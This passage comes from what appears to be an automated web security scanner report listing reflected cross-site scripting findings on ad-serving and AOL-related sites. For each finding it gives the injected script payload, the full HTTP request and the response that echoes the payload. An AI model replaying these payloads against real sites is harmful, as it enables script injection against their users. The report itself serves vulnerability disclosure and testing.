The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c2a"><script>alert(1)</script>771ead1711a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM28c2a"><script>alert(1)</script>771ead1711a/2010DM/11485203807@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM28c2a"><script>alert(1)</script>771ead1711a/2010DM/1478825337/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.83. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11485203807@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0abe"><script>alert(1)</script>8b2842306a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMa0abe"><script>alert(1)</script>8b2842306a2/11485203807@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMa0abe"><script>alert(1)</script>8b2842306a2/719493014/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.84. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11485203807@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61f91"><script>alert(1)</script>71d3e73a096 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11485203807@x2361f91"><script>alert(1)</script>71d3e73a096?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1427428079/x2361f91"><script>alert(1)</script>71d3e73a096/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.85. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1628576703@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52a9"><script>alert(1)</script>3157c2acd71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMc52a9"><script>alert(1)</script>3157c2acd71/2010DM/1628576703@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMc52a9"><script>alert(1)</script>3157c2acd71/2010DM/1693177449/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.86. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1628576703@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f603e"><script>alert(1)</script>27d19133c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMf603e"><script>alert(1)</script>27d19133c5/1628576703@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMf603e"><script>alert(1)</script>27d19133c5/785782942/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

1.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1628576703@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5cc"><script>alert(1)</script>f02ef969490 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1628576703@x239a5cc"><script>alert(1)</script>f02ef969490?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1871454065/x239a5cc"><script>alert(1)</script>f02ef969490/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.88. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1671449763@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62000"><script>alert(1)</script>f73671ebfb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM62000"><script>alert(1)</script>f73671ebfb0/2010DM/1671449763@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM62000"><script>alert(1)</script>f73671ebfb0/2010DM/1529177560/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.89. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1671449763@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bedb1"><script>alert(1)</script>bd5553a3aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMbedb1"><script>alert(1)</script>bd5553a3aa/1671449763@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMbedb1"><script>alert(1)</script>bd5553a3aa/362689577/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

1.90. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1671449763@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72819"><script>alert(1)</script>6bd426211c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1671449763@x2372819"><script>alert(1)</script>6bd426211c5?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1270783460/x2372819"><script>alert(1)</script>6bd426211c5/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.91. http://downloads.channel.aol.com/toolbar [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://downloads.channel.aol.com
Path:   /toolbar

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 794ee"-alert(1)-"6f9e676b6eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /toolbar794ee"-alert(1)-"6f9e676b6eb HTTP/1.1
Host: downloads.channel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.789990733.3152676352; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:36 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 8537
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtml" x
...[SNIP]...
<!--
s_265.mmxgo=false;
s_265.pageName="Page Not Found";
s_265.channel="us.downloads";
s_265.trackExternalLinks="true";
s_265.prop1="toolbar794ee"-alert(1)-"6f9e676b6eb";
s_265.pfxID="brw";
s_265.disablepihost=false;
s_265.prop12="http://downloads.channel.aol.com/toolbar794ee\"-alert(1)-\"6f9e676b6eb";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265
...[SNIP]...

1.92. http://downloadsquad.switched.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://downloadsquad.switched.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c89"><script>alert(1)</script>de3d7e413b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?62c89"><script>alert(1)</script>de3d7e413b9=1 HTTP/1.1
Host: downloadsquad.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 104528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://downloadsquad.switched.com/?62c89"><script>alert(1)</script>de3d7e413b9=1"/>
...[SNIP]...

1.93. http://downloadsquad.switched.com/2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://downloadsquad.switched.com
Path:   /2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60107"><script>alert(1)</script>f339a23027b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/?60107"><script>alert(1)</script>f339a23027b=1 HTTP/1.1
Host: downloadsquad.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:12 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:21:11 GMT; path=/
Keep-Alive: timeout=5, max=999985
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 67560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://downloadsquad.switched.com/2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/?60107"><script>alert(1)</script>f339a23027b=1"/>
...[SNIP]...

1.94. http://downloadsquad.switched.com/2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://downloadsquad.switched.com
Path:   /2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ebd1"><script>alert(1)</script>f18dae81e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/?9ebd1"><script>alert(1)</script>f18dae81e83=1 HTTP/1.1
Host: downloadsquad.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:21:22 GMT; path=/
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 69668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://downloadsquad.switched.com/2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/?9ebd1"><script>alert(1)</script>f18dae81e83=1"/>
...[SNIP]...

1.95. http://downloadsquad.switched.com/2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://downloadsquad.switched.com
Path:   /2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 271c2"><script>alert(1)</script>4f9f1e70ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/?271c2"><script>alert(1)</script>4f9f1e70ef=1 HTTP/1.1
Host: downloadsquad.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:21:22 GMT; path=/
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 66796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://downloadsquad.switched.com/2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/?271c2"><script>alert(1)</script>4f9f1e70ef=1"/>
...[SNIP]...

1.96. http://ds.addthis.com/red/psi/sites/www.politicsdaily.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.politicsdaily.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 49eb5<script>alert(1)</script>c7ecb15712e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.politicsdaily.com/p.json?callback=_ate.ad.hpr49eb5<script>alert(1)</script>c7ecb15712e&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.politicsdaily.com%2F%3F12b75&ref=http%3A%2F%2Fburp%2Fshow%2F54&j0hyy0 HTTP/1.1
